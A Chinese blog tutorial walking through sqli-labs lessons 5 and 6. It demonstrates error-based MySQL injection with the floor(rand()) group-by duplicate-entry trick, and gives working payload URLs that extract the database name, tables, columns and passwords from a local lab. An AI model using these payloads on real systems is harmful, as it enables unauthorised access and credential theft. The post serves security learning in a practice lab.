sql注入之lesson5&6

lesson 5&6(本章的重点在于如何构造使其产生错误,从而得到我们需要的信息)

id=1’ 报错 r ’ ’ 1’ ’ LIMIT 0,1 ’ at line 1

猜测 select usename,password from table where id='input'

id=1’ and 1=1 –+ 返回正常 id=1’ and 1=2 –+ 错误

判断字段 order by 3正确 order by 4 错误 3个字段

二.基于错误的sql语句构造
**几个重要的函数
——count():统计元组的个数

+----------+
| count(*) |
+----------+
|      285 |
+----------+
从information_schema.tables统计元组个数有多少


——rand():  用于产生一个0~1的随机数
mysql> select rand();
+--------------------+
| rand()             |
+--------------------+
| 0.9833602495336535 |
+--------------------+
1 row in set (0.00 sec)


——floor(): 向下取整
mysql> select floor(rand());
+---------------+
| floor(rand()) |
+---------------+
|             0 |
+---------------+
1 row in set (0.00 sec)

mysql> select floor(rand()*2);
+-----------------+
| floor(rand()*2) |
+-----------------+
|               1 |
+-----------------+
1 row in set (0.00 sec)


——group by:一句我们想要的规则对结果进行分组
mysql> select table_name,table_schema from information_schema.tables group by table_schema;
+----------------+--------------------+
| table_name     | table_schema       |
+----------------+--------------------+
| ia3nznrjd4                  | challenges                       |
| CHARACTER_SETS | information_schema    |
| columns_priv              | mysql                                |
| accounts                      | performance_schema  |
| emails                           | security                           |
| host_summary            | sys                                    |
+------------------------+-------------------------+
6 rows in set (0.01 sec)

在information_schema中选择table_name与table_schema,并且按照table_schema
进行排序,在table_name中显示table_chema中的第一个表


进入mysql命令行
use security;
select database();

select group_concat(0x3a,0x3a,database(),0x3a)name;
(0x3a 是分号的,表头太长取一个别名name)
+-------------+
| name        |
+-------------+
| ::security: |
+-------------+

接下来我们向里面添加刚才的随机数函数
select group_concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name;
+--------------+
| name         |
+--------------+
| ::security:1 |
+--------------+

我们再增加一点内容
select group_concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables;
informaition.tables 有多少条记录security显示多少次 随机数就执行多少次。

为了让显示更有序 我们换成排列  concat
select concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from informaition_schema.tables;

对结果分组 以那么分组
select concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from informaition_schema.tables group by name;

加一个count统计
select count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name;
多刷新几次 发现报错了,报错的信息有数据库的名字 那么我们可以的到更多信息

ERROR 1062 (23000): Duplicate entry '::security:0' for key '<group_key>'

我们将database换成version
select count(*),concat(0x3a,0x3a,version(),0x3a,floor(rand()*2))name from information_schema.tables group by name;

ERROR 1062 (23000): Duplicate entry '::5.7.19:1' for key '<group_key>'

为了得到想要查询的东西
比如说添加一个复杂的查询语句
select count(*),concat(0x3a,0x3a,version(),0x3a,floor(rand()*2))name from information_schema.tables group by name;

将version()换为(select table_name from information_schema.tables where table_schema=database() limit 0,1)
报错得到信息  继续查看其他信息 修改limit参数

回到sql注入 继续使用

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and   (select count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name) --+
 报错:Operand should contain 1 column(s)    操作应包含一列
 {
 kc表是一个数据表,假设表的行数为10行。
 select  1 from kc    增加临时列,每行的列值是写在select后的数,这条sql语句中是1

 }
 我们增加一列
 http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and   (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name)) --+

 报错: Every derived table must have its own alias    每个派生表必须有自己的别名
 修改如下
?id=1' and (select 1 from (select  count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+
 报错得到数据库名 Duplicate entry ::security:0 for key' 

 按照之前的想法我们把database() 换成更复杂的语句
 (select table_name from information_schema.tables where table_schema=database() limit 0,1)

 Duplicate entry '::emails:0' for key ''  得到表名email  修改limit得到第二个表
 Duplicate entry '::users:1' for key ''

为了得到user表里面的列名 修改一下
(select column_name from information_schema.columns where table_name='users' limit 0,1)
Duplicate entry '::USER:0' for key ''得到了其中的user列名 修改得到其他列名  得到password列名

获取字段内容
 (select password from users  limit 0,1)  得到   Duplicate entry '::Dumb:1' for key ''

介绍完了 基于错误的 sql注入 lesson6 改为双引号就可以了

这里为什么会报错 是mysql的一个bug http://bugs.mysql.com/bug.php?id=32249

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值